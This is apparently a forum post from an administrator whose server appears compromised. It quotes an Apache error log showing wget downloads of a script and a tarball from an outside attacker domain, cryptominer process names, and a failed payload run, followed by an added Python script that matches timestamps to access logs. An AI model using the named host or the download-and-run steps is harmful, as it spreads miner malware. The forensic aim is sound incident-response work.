Apache error log interpretation
- by HTF
It looks like someone gained access to my server.
How can I find out which Apache vHosts this log is related to?
How are these commands from the log invoked, and how/why are they printed to the log file? Is this some remote shell or PHP script?
/var/log/httpd/error_log
mkdir: cannot create directory `/tmp/.kdso': File exists
--2014-06-13 13:29:17-- http://updates.dyndn-web.com/abc.txt
Resolving updates.dyndn-web.com... 94.23.49.91
Connecting to updates.dyndn-web.com|94.23.49.91|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5055 (4.9K) [text/plain]
Saving to: `abc.txt'
0K .... 100% 303K=0.02s
2014-06-13 13:29:17 (303 KB/s) - `abc.txt' saved [5055/5055]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
^M 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0^M101 5055 101 5055 0 0 79686 0 --:--:-- --:--:-- --:--:-- 154k
minerd64: no process killed
minerd32: no process killed
named: no process killed
kernelupdates: no process killed
kernelcfg: no process killed
kernelorg: no process killed
ls: cannot access /tmp/.ICE-unix: No such file or directory
mkdir: cannot create directory `/tmp': File exists
--2014-06-13 13:29:18-- http://updates.dyndn-web.com/64.tar.gz
Resolving updates.dyndn-web.com... 94.23.49.91
Connecting to updates.dyndn-web.com|94.23.49.91|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 205812 (201K) [application/x-tar]
Saving to: `64.tar.gz'
0K .......... .......... .......... .......... .......... 24% 990K 0s
50K .......... .......... .......... .......... .......... 49% 2.74M 0s
100K .......... .......... .......... .......... .......... 74% 2.96M 0s
150K .......... .......... .......... .......... .......... 99% 3.49M 0s
200K 100% 17.4M=0.1s
2014-06-13 13:29:18 (1.99 MB/s) - `64.tar.gz' saved [205812/205812]
sh: ./kernelupgrade: Permission denied
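One way to approach the vHost question, as an added example that is not part of the original post: it assumes the unprefixed lines are stderr from commands started by a web request, so the triggering request appears in one vHost's access log just before the wget timestamps. The vHost names, request paths and client addresses are constructed; combined log format and local timestamps from the same server clock are assumed.

```python
import re
from datetime import datetime, timedelta

# wget prints "--YYYY-MM-DD HH:MM:SS-- URL" on stderr for each download.
WGET_RE = re.compile(r"^--(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)--\s+(\S+)", re.M)
# Timestamp and request line of a combined-format access log entry.
ACCESS_RE = re.compile(r'\[(\d\d/\w{3}/\d{4}:\d\d:\d\d:\d\d) [+-]\d{4}\] "([^"]*)"')

def wget_events(error_log):
    """Return (local time, URL) for every wget banner in the error log."""
    return [(datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), url)
            for ts, url in WGET_RE.findall(error_log)]

def requests_near(access_logs, events, window=5):
    """Return (vhost, request line) logged up to `window` seconds before an event."""
    hits = []
    for vhost, text in access_logs.items():
        for ts, request in ACCESS_RE.findall(text):
            when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S")
            # The access log records when the request arrived, so it precedes the command.
            if any(timedelta(0) <= ev - when <= timedelta(seconds=window)
                   for ev, _ in events):
                hits.append((vhost, request))
    return hits

# Lines copied from the error_log in the post.
ERROR_LOG = """mkdir: cannot create directory `/tmp/.kdso': File exists
--2014-06-13 13:29:17-- http://updates.dyndn-web.com/abc.txt
minerd64: no process killed
--2014-06-13 13:29:18-- http://updates.dyndn-web.com/64.tar.gz
sh: ./kernelupgrade: Permission denied
"""

# Constructed per-vHost access logs (hypothetical names, paths, documentation IPs).
ACCESS_LOGS = {
    "shop.example.com": '192.0.2.10 - - [13/Jun/2014:13:29:16 +0100] '
                        '"POST /cgi-bin/form.cgi HTTP/1.1" 200 312 "-" "-"\n',
    "blog.example.com": '198.51.100.7 - - [13/Jun/2014:13:20:02 +0100] '
                        '"GET /index.html HTTP/1.1" 200 5120 "-" "-"\n',
}

if __name__ == "__main__":
    for vhost, request in requests_near(ACCESS_LOGS, wget_events(ERROR_LOG)):
        print(vhost, request)
```

On a real server, fill `ACCESS_LOGS` from each vHost's `CustomLog` file; a request that lines up with every download is the one to inspect first.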